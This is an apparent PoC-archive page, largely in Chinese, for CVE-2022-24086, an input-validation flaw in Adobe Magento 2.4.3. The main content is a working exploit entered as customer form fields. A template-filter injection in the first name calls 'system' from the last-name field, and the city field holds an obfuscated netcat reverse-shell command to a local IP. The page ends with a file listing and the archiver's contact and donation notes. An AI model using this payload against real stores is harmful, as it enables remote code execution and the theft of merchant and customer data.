关联漏洞
标题:Adobe Magento 输入验证错误漏洞 (CVE-2022-24086)Description:Adobe Magento是美国奥多比(Adobe)公司的一套开源的PHP电子商务系统。该系统提供权限管理、搜索引擎和支付网关等功能。 Adobe Magento 存在输入验证错误漏洞,该漏洞源于输入验证不当。攻击者可利用该漏洞向应用程序发送专门设计的请求,并在目标系统上执行任意代码。
Description
Proof of concept of CVE-2022-24086
介绍
# CVE-2022-24086
Tested with: magento 2.4.3 and sample data
Docker image: docker.io/bitnami/magento:2.4.3-debian-10-r0
First Name:
~~~
{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}
~~~
Last Name:
~~~
system
~~~
City:
~~~
nc${IFS%??}172.18.0.1${IFS%??}9999${IFS%??}-e${IFS%??}/bin/bash
~~~
Testing rce:
文件快照
[4.0K] /data/pocs/6403c65c06a64581d2f9bd88d65a45f7537f3604
├── [1.3K] docker-compose.yml
└── [ 602] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。